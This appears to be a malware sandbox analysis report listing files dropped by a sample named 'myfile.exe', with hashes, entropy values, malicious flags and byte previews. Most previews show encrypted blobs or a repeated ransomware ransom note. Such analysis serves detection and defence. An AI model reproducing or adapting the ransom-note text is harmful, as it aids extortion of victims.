                                                              Preview:....h`.j......j...e.....("..z8 ..^..../K...;u.........T)%1..wp.)......W)......1..}.}.O.}..-.\..%.e..a...Uc.Z..I.....E8.E.d....TD...,..Z...v.'.bw4R.~.s....@.G.........-...x.mS..d/..)|..h<U...)..... .H7*mq9:.Z..[...d..#|\9M...`0i.}.S.P.....?.A...Q=_[;...Z.H..9M.a.>I...&....X..b...5...>..s.x>.H......f.....w...8...WS.D.....D..
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):337
                                                              Entropy (8bit):7.37817485838742
                                                              Encrypted:false
                                                              SSDEEP:6:CF9zT1/sHAsSLHCWeuM6MJELW55t6IXL1foH4tMj+fUAaxbNlzIFn:ozT1sgpLHZVM6niloH4tMj+8TBPIFn
                                                              MD5:12290663F0BB0F524927C66D5D36F241
                                                              SHA1:8F3EDC570AFAA90C5A637DF1AA9E508BC0046E75
                                                              SHA-256:A641A48BA7F24892F26594B4E419AD011696769B84B0544AE6FBB4797D2F8EA1
                                                              SHA-512:2378F43AD04B897BE2B19445A6B485EC5763723137A817520B0D07A5C4947F5BFD9F33161DD72CC38AA822DAAEA5A1DE4B6B723AF81F186B08B0AFFD231F24DB
                                                              Malicious:false
                                                              Preview:..2uzz....&{....C.D.Sc.o.T...._1..E.....K2...ZY../.X..e.id..i.P.fWF...q..L......w...^G$l...6.'.z.d....J.GUc.Z..I.....E8.E.d....TD...,..Z...v.'.bw4R.~.s....@.G.........-...x.mS..d/..)|..h<U...)..... .H7*mq9:.Z..[...d..#|\9M...`0i.}.S.P.....?.A...Q=_[;...Z.H..9M.a.>I...&....X..O...H.Z...x..T....J........E5.J..!u.;.......mw.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):340
                                                              Entropy (8bit):7.414519566904329
                                                              Encrypted:false
                                                              SSDEEP:6:YGwWdxrqy9xUpGE9yeqfhMJELW55t6IXL1foH4tMj+fUU2FYb8yzH:CWdtfxgl3EniloH4tMj+8yz
                                                              MD5:E43D0E2A9F1075972608E93D589E26E8
                                                              SHA1:2362C5C3A9ECC932B6C27AB4EBBB0A7DBD105CA9
                                                              SHA-256:926104824CE83C6AC9BB7A61984F57C0AC5DC5EF2CAEBD7C9DA699E8FF6DD328
                                                              SHA-512:C980FDD637E61658AD9C326340ED2A9B7DF830A2F2CC38FB87159D9AB79F47E4370B38E16B5D0B759AD9DBF637832450303E30EADA8AFA557E5F1432DFD12E42
                                                              Malicious:false
                                                              Preview:..?.}......;fO.B...T.....b.8...x..a.gSE\fU...%.cG..J.%......i&.....u.P.'.vI.?(Q.F.fV....r..'...p....0?.6wUc.Z..I.....E8.E.d....TD...,..Z...v.'.bw4R.~.s....@.G.........-...x.mS..d/..)|..h<U...)..... .H7*mq9:.Z..[...d..#|\9M...`0i.}.S.P.....?.A...Q=_[;...Z.H..9M.a.>I...&....X....GQK......D+.opO...f.W..e.z.&..[ckJ..t*..K......v.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):339
                                                              Entropy (8bit):7.336615109182431
                                                              Encrypted:false
                                                              SSDEEP:6:TzhRpNlYfe4Ome2Ne/pAHKMJELW55t6IXL1foH4tMj+fU/ZoOBC25DjMM4G:5RdYfewd8/pAHKniloH4tMj+8/Z9x5
                                                              MD5:1EA123ED172D4E769DAC40E5E1637CBC
                                                              SHA1:1E799EE7E0B1EF398B07E9494B61151CC453E827
                                                              SHA-256:547A1CEC0A7243FE9BA3DEE5937A70AD484BF5971ED2E95AA1DE6D2CFC0C41DF
                                                              SHA-512:623D7D47FA16E9C6AAB9953C03AA2BA571BDE1D148A1E610A7D274066E76EE626160E587E5DFD7C2C031CD70762F18770F0619B2C58B98B61A33B2E7FFA1FC6C
                                                              Malicious:false
                                                              Preview:GA....\.0..@....^.l.I.....P.,.Y@.P..^4.U&..L.9.....m..%^8/...X.....x.Z,.X.Ba..;.......y....&.......6..qUc.Z..I.....E8.E.d....TD...,..Z...v.'.bw4R.~.s....@.G.........-...x.mS..d/..)|..h<U...)..... .H7*mq9:.Z..[...d..#|\9M...`0i.}.S.P.....?.A...Q=_[;...Z.H..9M.a.>I...&....X..J..C..:{<......Z.(9..>.P.4qu.b...q..A.G.....,h.c
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):340
                                                              Entropy (8bit):7.3134474257966815
                                                              Encrypted:false
                                                              SSDEEP:6:Jntb70B8t2B/xPbR1G9KMJELW55t6IXL1foH4tMj+fU8paOrakKv:Jnt/xkfjR1G8niloH4tMj+8KafkKv
                                                              MD5:103AB7CB633211CA356E2F38ACFB5ED6
                                                              SHA1:65E265EBE74BDB00613F0BBEA2A943D9000617A4
                                                              SHA-256:5F20F38E72DA66FA7C96C79CFCE031D7A81BDBA83FB8E54FBA53FC555E88D02B
                                                              SHA-512:DADF1689B0C33A8AA7400439147B90CB908CC2549D70C38AD9F33AA7BE73CAB4B294305D8944DD3F9BF537A7814B253CCF7DC2FEAFDD121B18080BCF14FFC533
                                                              Malicious:false
                                                              Preview:g..r.r.k):T......O....x0Q..e..H.........A.yDd..."d.Ip..c....Q<....j..4#i.0{............j.!.2r$.D.W..M..i[Qt.Uc.Z..I.....E8.E.d....TD...,..Z...v.'.bw4R.~.s....@.G.........-...x.mS..d/..)|..h<U...)..... .H7*mq9:.Z..[...d..#|\9M...`0i.}.S.P.....?.A...Q=_[;...Z.H..9M.a.>I...&....X..Z.`H.j.pg4;...O.kM..F12...F..a...TOx../..mw....x...
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):342
                                                              Entropy (8bit):7.463594821875806
                                                              Encrypted:false
                                                              SSDEEP:6:xfXEQq2uZgzIQFr4ezDUtdI1NV9ntCKMJELW55t6IXL1foH4tMj+fUSZG0gXMXt4:xfk2ul2r5zD8K1j9tZniloH4tMj+8SZi
                                                              MD5:C230E6E80F3CC401EDE7539EB3610B8F
                                                              SHA1:02A7F0C2BACB5197BEAEB6BCFC82DDE0DEAB1479
                                                              SHA-256:0C81919B12869CB6FDD095470ADC36F4751445DDB74087A7E2C28A6E5C219AF1
                                                              SHA-512:B93AB6EBD31C6ED888B6BB22A6C48857DFCA1AEBDCBB6427BC8A599B5242D71CA54A7C985710EA8D9212FA56B3104CF46597A0D71E0D68DBC4624A33DFEE001E
                                                              Malicious:false
                                                              Preview:.VS.....'.v/..m n..u...g.K.E.|....W.4.i.C1ka....S'.{...q.b..#p..H.d..!.<1.w6..6..C.2.CV...(}..&.K.c..Pt>Uc.Z..I.....E8.E.d....TD...,..Z...v.'.bw4R.~.s....@.G.........-...x.mS..d/..)|..h<U...)..... .H7*mq9:.Z..[...d..#|\9M...`0i.}.S.P.....?.A...Q=_[;...Z.H..9M.a.>I...&....X..4L.b.......e.........?.Yh.....A.s.%W@#Sz........Q..
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):340
                                                              Entropy (8bit):7.39550664500224
                                                              Encrypted:false
                                                              SSDEEP:6:IAlpn+JovAaKL1pkMfqMJELW55t6IXL1foH4tMj+fUQTVkMa:Zlp+MjoOniloH4tMj+8QCMa
                                                              MD5:3D158F5BB544401950F02ED96916EA5F
                                                              SHA1:D5C53FC1D0C31FEA53CB5AB2FEB894434A57165A
                                                              SHA-256:E6A9F978EBC42B4320ACF7CD698D8B4FB2CDB9ABFEAD5869196E73E390BDA297
                                                              SHA-512:781EB03CC42B6C08EAD8971DDD552A6CD9709F9F534648EB5D81ED43EC186EDDD398D1B4B3BE9032D8750512543857EC4D4E881290E6FB77ABC8F419E76CB27C
                                                              Malicious:false
                                                              Preview:(a.....K.I.L.m...)....RB..p.q>-F.\.......>.]kE.h....*..b......df.q............E..#Di...M..*s..h]p...uy@...,.Uc.Z..I.....E8.E.d....TD...,..Z...v.'.bw4R.~.s....@.G.........-...x.mS..d/..)|..h<U...)..... .H7*mq9:.Z..[...d..#|\9M...`0i.}.S.P.....?.A...Q=_[;...Z.H..9M.a.>I...&....X..A.4*...6[...p{X.._#(..........&....Y..%..........
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:true
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:true
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
